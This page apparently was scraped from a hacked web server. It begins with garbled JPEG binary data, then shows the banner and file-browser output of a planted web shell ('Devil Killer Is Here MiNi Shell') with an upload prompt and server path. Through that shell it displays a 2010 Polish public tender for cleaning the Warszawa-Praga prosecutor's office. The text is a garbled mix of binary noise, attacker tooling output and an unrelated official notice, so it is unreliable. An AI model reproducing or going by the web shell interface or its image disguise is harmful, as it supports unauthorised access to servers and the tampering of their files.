JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101203/395718-N-2010.html

<p class="kh_header"><b>Warszawa: Sprzątanie pomieszczeń biurowych i terenów przyległych</b><br>
<b>Numer ogłoszenia: 395718 - 2010; data zamieszczenia: 03.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prokuratura Okręgowa Warszawa-Praga w Warszawie , ul. Bródnowska 13/15, 03-439 Warszawa, woj. mazowieckie, tel. 22 51 14 776, faks 22 51 14 722.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawapraga.po.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie pomieszczeń biurowych i terenów przyległych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. ZAKRES PRAC ZWIĄZANYCH Z UTRZYMANIEM CZYSTOŚCI W POMIESZCZENIACH PROKURATURY OKRĘGOWEJ  WARSZAWA-PRAGA W WARSZAWIE WRAZ Z TERENEM PRZYLEGŁYM ORAZ W POMIESZCZENIACH OGÓLNODOSTEPNYCH W PROKURATURZE REJONOWEJ  PRAGA - POŁUDNIE  PRZY UL. KAMIENNEJ 14

POMIESZCZENIA BIUROWE - PROKURATURA OKRĘGOWA 
1 raz dziennie oraz w razie potrzeby:
-	umyć meble, parapety;
-	wytrzeć z kurzu monitory przeznaczonym do tego środkiem;
-	umyć aparaty telefoniczne,
-	wytrzeć kontakty na sucho;
-	usunąć worki z odpadami;
-	opróżnić niszczarki,
-	odkurzyć wykładzinę (albo umyć podłogę TARKIET)

POMIESZCZENIA SOCJALNE: - PROKURATURA OKRĘGOWA I REJONOWA
Środki myjąco-dezynfekujące.
Sprzątanie 1 raz dziennie oraz w razie potrzeby:
-	usunąć worki z odpadami (osobno pojemnik na odpady segregowane - plastik i szkło),
-	umyć drzwi, szafy, stoły, szafki, parapety, krzesła, 
-	umyć podłogi (PCV lub terrakota)

POMIESZCZENIA OCHRONY: - PROKURATURA OKRĘGOWA
Środki myjąco-dezynfekujące.
Sprzątanie 1 raz dziennie oraz w razie potrzeby:
-	usunąć worki z odpadami,
-	umyć drzwi, szafy, stoły, szafki, parapety, krzesła, 
-	umyć podłogi (PCV lub terakota)

TOALETY: - PROKURATURA OKRĘGOWA I REJONOWA
Środki myjąco-dezynfekujące.
Dezynfekcja i mycie 1 raz dziennie oraz w razie potrzeby:
-	usunąć worki z odpadami,
-	umyć lustra, glazurę, drzwi, umywalki, armaturę,
-	umyć pojemniki na mydło i ręczniki papierowe (po opróżnieniu),
-	umyć i zdezynfekować muszle klozetowe, pisuary,
-	umyć podłogi,
-	umyć kabiny prysznicowe,
-	umyć kabiny łazienkowe,

KORYTARZE I KLATKI SCHODOWE - PROKURATURA OKRĘGOWA I REJONOWA
Środek myjąco- dezynfekujący.
Sprzątanie  1 raz dziennie oraz w razie potrzeby:    
-    umyć przeszklone drzwi wejściowe do wszystkich klatek schodowych oraz do innych 
      pomieszczeń (np. sale konferencyjne);
-	usunąć worki z odpadami,
-	wytrzeć na sucho kontakty,
-	umyć drzwi, uchwyty, 
-	umyć parapety,
-	umyć i zdezynfekować pojemniki na odpady,
-	umyć podłogi i listwy przypodłogowe.

Przy usuwaniu worków z odpadami należy stosować zasadę ich segregacji:
-	w osobnych workach papier , plastik i szkło (papier z opróżnionych niszczarek i plastik oraz szkło z osobnych pojemników w pomieszczeniach socjalnych)
-	w osobnych workach pozostałe odpady stałe. 
Worki należy składować w pojemnikach przeznaczonych na odpady segregowane i pozostałe nieczystości stałe.

CZĘSTOTLIWOŚĆ CZYSZCZENIA INNYCH ELEMENTÓW W POMIESZCZENIACH  PROKURATURY OKRĘGOWEJ I REJONOWEJ PRAGA POŁUDNIE

Co 2 tygodnie: (wszystkie pomieszczenia)
-	umyć kaloryfery.
-	umyć balustrady i inne elementy zdobiące na klatkach schodowych,
-	umyć lustra poza toaletami,
-	umyć aparaty telefoniczne.

Co miesiąc: (wszystkie pomieszczenia):
-	wytrzeć wilgotną ściereczką godła, ramy od obrazów, zegary, tablice, instrukcje, sztuczne kwiaty, inne ozdoby,
-	umyć kratki wentylacyjne, wentylatory, urządzenia klimatyzacyjne,
-	odkurzyć meble tapicerskie,
-	umyć całą powierzchnię glazury niezależnie od niezbędnego miejscowego codziennego mycia,
-	umyć lamperie niezależnie od niezbędnego miejscowego codziennego 
mycia,
-	umyć kinkiety,
-	umyć wewnętrzne lampy oświetleniowe

Dwa razy w ciągu trwania umowy (jeden raz w ciągu I półrocza i jeden raz w ciągu II półrocza) po otrzymaniu pisemnego zlecenia: 
-	umyć we wszystkich pomieszczeniach dwustronnie okna PCV wraz z ościeżnicami w terminie wskazanym przez Zamawiającego w liczbie 405, o powierzchni ogólnej 650,00 m2.
-	umyć parapety zewnętrzne, 
-	umyć żaluzje,
-	odsunąć meble od ściany w miarę możliwości i odkurzyć odkryte miejsca.
-	Uprzątnąć piwnice w budynku Prokuratury Okręgowej Warszawa-Praga w Warszawie i budynku Prokuratury Rejonowej Praga Północ przy ul. Jagiellońskiej 5.

UWAGA!
Termin realizacji ww. wymienionych usług uzależniony będzie od potrzeb Zamawiającego

SERWIS PRAC PORZĄDKOWO-OGRODNICZYCH NA TERENIE JEDNOSTKI (2 143,00 m2)                                                                     ORAZ NA TERENIE PRZYLEGŁYM (999,7 m2):

Czynności porządkowe wykonywane 1 raz dziennie lub według potrzeb w trakcie realizacji Umowy:
-	Dbanie o porządek i czystość, w tym utrzymywanie w czystości (zamiatanie, sprzątanie liści, śmieci, koszenie trawnika 70 m2  itp.):
-	podwórza jednostki;
-	parkingu jednostki;
-	terenu przylegającego do jednostki w kwartale ulic: Kamiennej, Szwedzkiej i Bródnowskiej; 
-	Wybieranie z koszy śmieci.
-	Usuwanie śniegu i lodu w porze zimowej z terenu parkingu oraz chodników okalających budynek przy użyciu sprzętu mechanicznego przeznaczonego do tego typu prac - czas reakcji 1,5 h od momentu opadu śniegu, posypywanie terenu piaskiem, solą lub chlorkiem wapnia oraz w tym samym dniu a najpóźniej następnym (po godzinach pracy urzędu od godz. 16.00 do godziny 7.00 dnia następnego) wywiezienie zalegającego śniegu z terenu parkingu.
-	Utrzymanie w należytej czystości miejsca na odpady komunalne (przy każdorazowym wywozie odpadów mycie i zamiatanie, w miesiącach letnich 2 razy dziennie) oraz nadzorowanie segregacji odpadów składowanych przez osoby sprzątające pomieszczenia wewnątrz obiektu;
-	Oczyszczanie gzymsów, dachu i rynien z liści, śniegu i sopli lodu itp.(praca na wysokości) na żądanie Zamawiającego; 

INNE CZYNNOŚCI POMOCNICZE - WYKONYWANE SYSTEMATYCZNIE LUB KRESOWO:
-	uzupełnianie mydła w żelu, bezzapachowych ręczników papierowych w suszarkach, papieru toaletowego, kostek toaletowych,
-	bieżąca wymiana worków w pojemnikach na odpady.

II ZAKRES PRAC PORZĄDKOWO-OGRODNICZYCH NA TERENIE NIERUCHOMOŚCI POŁOŻONEJ W NOWYM DWORZE MAZOWIECKIM PRZY UL. PADEREWSKIEGO 3  (770,30 m2) ORAZ NA TERENIE PRZYLEGŁYM - CHODNIKU  (100,00 m2)

Czynności porządkowe wykonywane 1 raz dziennie lub według potrzeb w trakcie realizacji Umowy:
-	Dbanie o porządek i czystość, w tym utrzymywanie w czystości:
-	podwórza jednostki;
-	parkingu jednostki;
-	terenu przylegającego do jednostki od strony ul. Paderewskiego 3;
-	wybieranie z koszy i zbieranie śmieci na całym terenie;
-	Usuwanie śniegu i lodu w porze zimowej z terenu parkingu oraz chodników okalających budynek - czas reakcji 1,5 h od momentu opadu śniegu - oraz posypywanie terenu piaskiem, solą lub chlorkiem wapnia;
-	Utrzymanie w należytej czystości miejsca na odpady komunalne (przy każdorazowym wywozie odpadów mycie i zamiatanie, w miesiącach letnich 2 razy dziennie);
-	Oczyszczanie dachu i rynien z liści, śniegu i sopli lodu itp.(praca na wysokości)

III MYCIE DWUSTRONNE OKIEN WRAZ Z OŚCIEŻNICAMI I KRATAMI ORAZ PARAPETAMI ZEWNĘTRZNYMI I WEWNĘTRZNYMI 

UWAGA! Realizacja usługi przez pracowników posiadających uprawnienia do pracy na wysokościach

-	W pierwszym półroczu 2011 roku w terminie wskazanym:

1.	Prokuratura Okręgowa Warszawa-Praga i Prokuratura Rejonowa Warszawa Praga-Południe	                                   	                              -   650 m2 
2.	Prokuratura Rejonowa Warszawa Praga - Północ                  -    532 m2.
3.	Prokuratura Rejonowa w Legionowie                                     -      50 m2 
4.	Prokuratura Rejonowa w Nowym Dworze Mazowieckim      -    135 m2.
5.	Prokuratura Rejonowa w Wołominie                                      -    190 m2.
6.	Prokuratura Rejonowa w Otwocku                                         -    252 m2.
                                                                                                 __________________________
                                        Razem                                                                          1809 m2

-	W drugim półroczu 2011 roku w terminie wskazanym:

1.	Prokuratura Okręgowa Warszawa-Praga i Prokuratura Rejonowa Warszawa Praga-Południe	                                                                             -  650 m2 
2.	Prokuratura Rejonowa Warszawa Praga - Północ                  -  532 m2.
3.	Prokuratura Rejonowa w Legionowie                                     -   50 m2 
4.	Prokuratura Rejonowa w Nowym Dworze Mazowieckim      - 135 m2.
5.	Prokuratura Rejonowa w Wołominie                                      - 190 m2.
6.	Prokuratura Rejonowa w Otwocku                                         - 252 m2.
                                                                                                 __________________________
                                        Razem                                                                         1809 m2

IV PRANIE FIRAN I ZASŁON

-	W pierwszym półroczu 2011 roku w terminie wskazanym:

1.	Prokuratury Rejonowe 	                                           - 350 m2.
                                                                                                
-	W drugim półroczu 2011 roku w terminie wskazanym:

1.	Prokuratury Rejonowe 	                                        -   350 m2.

V CZAS PRACY

- rutynowe sprzątanie we wszystkie dni robocze w godz. od 1600 - 2200.
- sprzątaczka dyżurna w budynku Prokuratury Okręgowej Warszawa Praga w Warszawie, w wszystkie dni robocze w godz. od 800 - 1200 - zakres czynności będzie obejmował prace porządkowe wynikające z doraźnych potrzeb w wszystkich pomieszczeniach podlegających sprzątaniu.

V JAKOŚĆ PRACY

1.	Wykonawca winien zapewnić utrzymanie stale odpowiedniego wysokiego poziomu czystości we wszystkich wyszczególnionych powyżej pomieszczeniach również podczas remontów i awarii oraz sprzątanie po remontach.
2.	Usługi powyższe Wykonawca wykona z użyciem własnego sprzętu mechanicznego i atestowanych środków (myjących, czyszczących, pielęgnujących, myjąco - dezynfekujących itp.).
3.	Sprzęt przeznaczony do sprzątania oraz środki czystości należy  przechowywać w wyznaczonych do tego przez Zamawiającego miejscach.

INFORMACJE DODATKOWE
PRZEDSTAWICIEL WYKONAWCY: 
1.	zobowiązany jest do ścisłej współpracy z wyznaczonym przedstawicielem Zamawiającego (możliwość nawiązania kontaktu telefonicznego z Zamawiającym);
2.	jest odpowiedzialny za całokształt pracy podległego personelu; 
3.	obowiązany jest do czynnej obecności przez 5 dni w tygodniu;
4.	obowiązany jest do codziennego wizytowania wszystkich podlegających mu odcinków; 
5.	nie opuszcza obiektu bez wyznaczenia kompetentnej i upełnomocnionej osoby do sprawowania zastępstwa;
6.	zobowiązany jest do niezwłocznego korygowania powstałych błędów w realizacji przedmiotu umowy.

WYKONAWCA ZOBOWIĄZUJE SIĘ DO:
1.	przedstawienia swojego doświadczenia w pracy (o podobnym profilu) z ostatnich 3 lat potwierdzonego referencjami klientów z podaniem kontaktów telefonicznych do osób, które mogą je potwierdzić. Za spełnienie ww. warunku Zamawiający uzna Wykonawców, którzy wykażą się co najmniej jednym tożsamym z niniejszym, zamówieniem;
2.	przedstawienia wyznaczonemu przedstawicielowi Zamawiającego imiennego grafiku pracowników zatrudnionych na terenie jednostki. Wszelkie zmiany są niezwłocznie nanoszone i informacja przekazywana jest do wyznaczonego przedstawiciela Zamawiającego, 
3.	 usuwania z terenu Zamawiającego własnego zużytego sprzętu we własnym zakresie i na własny koszt.
4.	do zapewnienia wysokiej jakości obsługi  przez wszystkie robocze dni w trakcie realizacji Umowy, na tym samym poziomie;
5.	usługa będzie świadczona zgodnie z ustaleniami i zapewni wymagane minimum pracowników umożliwiające płynną obsługę jednostki - niezależnie od sezonu urlopowego;
6.	wytypowania osoby sprawującej funkcję Kierownika Obiektu Firmy oraz przedstawienia Zamawiającemu imiennego wykazu osób zatrudnionych w obiekcie Zamawiającego, najpóźniej do dnia podpisania umowy;
7.	pracownicy muszą posiadać identyfikatory i prezentować schludny i estetyczny wygląd;
8.	zapewnienia odzieży ochronnej dla pracowników, nie zniszczonej, estetycznej;
9.	zapewnienia co najmniej dwóch pracowników z uprawnieniami do pracy na wysokościach;
10.	terminy prac wykonywanych okresowo będzie ustalał przedstawiciel Zamawiającego.
Z odpowiednim wyprzedzeniem Specjalista ds. nieruchomości będzie informował przedstawiciela Zamawiającego o planowanej realizacji prac wykonywanych okresowo;
11.	środki stosowane do sprzątania nie zniszczą sprzętu, powierzchni, są wysokiej jakości       
i produkcji renomowanych firm;
12.	na terenie jednostki, magazynu Wykonawcy przechowywane będą tylko środki w oryginalnych opakowaniach a rozpakowywane tylko do użytku na terenie jednostki; 
13.	zapewnienia zaopatrzenia w bezzapachowy papier toaletowy (celuloza - 2 warstwowy, małe rolki, listkowany, białe), bezzapachowe ręczniki papierowe (ręczniki składane Z-Z papierowe, miękkie, 1-listkowe, białe), mydło toaletowe płynne (mydło higieniczne z odczynnikiem Ph 5,5 posiadające atest), worki foliowe do pojemników na odpady 35 l (HD), kostki toaletowe (zawieszki), środki zapachowe;
14.	zapewnienia zaopatrzenia w następujące środki antypoślizgowe: piasek, sól, chlorek wapnia.

Wykonawca przyjmuje do wiadomości, że trzykrotne, udokumentowane uchybienie w realizacji przedmiotu umowy, potwierdzone przez Specjalistę ds. nieruchomości lub osobę przez niego wyznaczoną oraz osobę odpowiedzialną z ramienia Zamawiającego, skutkować będzie zastosowaniem kary umownej w wysokościach przewidzianych w projekcie umowy - ZAŁĄCZNIK NR 8 do SIWZ. 

ODPOWIEDZIALNOŚĆ
Odpowiedzialność za utrzymanie czystości w jednostce we wszystkich pomieszczeniach jednostki odpowiedzialna jest Firma sprzątająca na warunkach określonych w umowie z jednostką z wyłączeniem miejsc zastrzeżonych przez Zamawiającego.  

ODPOWIEDZIALNOŚĆ ZA NADZÓR NAD UTRZYMANIEM CZYSTOŚCI
-	Kierownik Obiektu Firmy sprzątającej odpowiada za  nadzór nad stosowaniem przez pracowników Firmy wymagań przedstawionych przez Zamawiającego.
-	Przedstawiciel Zamawiającego odpowiada za:
-	     bieżącą kontrolę jakości usług świadczonych przez Firmę sprzątającą;
-	przeprowadzanie audytów procesu sprzątania. 
-	Przedstawiciel Zamawiającego odpowiada za:
-	składanie do kierownika jednostki pisemnych wniosków o zastosowanie kar umownych wobec Firmy sprzątającej w sytuacji niedotrzymania warunków umowy.



Wszystkie nieuregulowane kwestie w SIWZ zapisane są w projekcie Umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu Wykonawcy, stanowiących nie więcej niż 30% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.10.00-3, 90.91.40.00-7, 90.91.13.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1.	Kwota wadium wynosi 4 000,00 złotych (słownie: cztery tysiące złotych 0/100).
12.2.	Wadium należy wnieść do dnia 15 grudnia 2010r. do godz. 12.00 w pieniądzu wyłącznie przelewem bankowym na konto Zamawiającego:  

Prokuratura Okręgowa Warszawa-Praga w Warszawie
Nr rachunku: 86 1090 1883 0000 0001 0487 6197
(z podaniem w tytule wpłaty dopisku o treści)
/Sprzątanie - znak sprawy I/10/U/2010/

12.3.	Za termin wniesienia wadium w pieniądzu uważa się dzień i godzinę wpływu środków na konto Zamawiającego podane powyżej lub złożenie oryginału gwarancji czy poręczenia na ręce Zamawiającego za potwierdzeniem odbioru (może być dołączone do oferty pod warunkiem, że nie jest z nią trwale złączone).
12.4.	Wadium może być wnoszone w pieniądzu (przelewem na konto bankowe Zamawiającego z konta bankowego Wykonawcy), poręczeniach oraz gwarancjach bankowych, gwarancjach ubezpieczeniowych lub w formie poręczeń udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).Zarówno gwarancje jak i poręczenia o których mowa w ust. 3 ww. ustawy muszą być udzielane do końca terminu związania ofertą wskazanego w niniejszej SIWZ oraz wskazywać wszystkie bez wyjątku wymienione w art. 46 ust. 4a i ust. 5 uPzp okoliczności, w których Wykonawca składający ofertę traci wadium na rzecz Zamawiającego (lub wskazanie odpowiednio co najmniej przepisów, tj. art. 46 ust. 4a oraz art. 46 ust. 5 ustawy Prawo zamówień publicznych).
12.5.	Wykonawca, którego oferta nie będzie w całości zabezpieczona akceptowaną formą wadium na warunkach określonych w uPzp lub niniejszej SIWZ, w tym również na przedłużony okres związania ofertą, lub gdy Wykonawca nie zgodzi się na przedłużenie okresu związania ofertą, zostanie przez Zamawiającego wykluczony z postępowania.
12.6.	W przypadku wadium wniesionego w formie gwarancji lub poręczeń i sporządzonego w języku obcym, Zamawiający żąda, by do oferty zostało złożone jego tłumaczenie na język polski w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez osobę/osoby uprawnione do reprezentowania Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia warunku posiadania wiedzy i doświadczenia: 
podpisanego wykazu wykonanych (zakończonych) usług (także w przypadku wykonywanych świadczeń okresowych lub ciągłych) zawierającego co najmniej jedną usługę sprzątania pomieszczeń biurowych o łącznej powierzchni co najmniej 3.000 m2 i 3000 m2 terenu ulic, parkingów itp., wykonaną w ciągu ostatnich 3 lat (liczonych od daty wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) potwierdzający, iż w tym okresie Wykonawca zrealizował (liczy się data zakończenia) co najmniej jedną taką usługę - z podaniem:
-	opisu przedmiotu wykonanej usługi sprzątania pomieszczeń biurowych o łącznej powierzchni co najmniej 3.000 m2 i 3000 m2 terenu ulic, parkingów itp., z podaniem w metrach kwadratowych powierzchni biurowej objętej sprzątaniem (w tym także zrealizowanej-zakończonej części wykonywanej usługi, zgodnej z wymaganiem Zamawiającego, w ramach jeszcze trwającej całościowej usługi - w przypadku wykonywanych świadczeń okresowych lub ciągłych),
-	odbiorcy usługi (nazwa i adres Odbiorcy),
-	daty wykonania usługi - dzień, miesiąc, rok - tj. datę jej zakończenia, a w przypadku wykonywanych świadczeń okresowych lub ciągłych - datę zakończenia części usługi zgodnej z wymaganiem Zamawiającego.
Do wykazu należy załączyć dokument(-y) potwierdzający(-e), że wskazana(-e) usługa(-i) została(y) wykonana)-e) należycie (itp. referencja, protokół odbioru itp.) - oryginał(-y) lub kopia(-e) poświadczona(-e) za zgodność z oryginałem przez Wykonawcę. Wykonawca nie może być wystawcą dokumentu (-ów) potwierdzającego(-ych) należyte wykonanie usługi.
Przez pojęcie usługa należy rozumieć sprzątanie pomieszczeń biurowych o łącznej powierzchni co 3.000 m2 i 3000 m2 terenu ulic, parkingów itp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia sytuacji ekonomicznej i finansowej:
opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

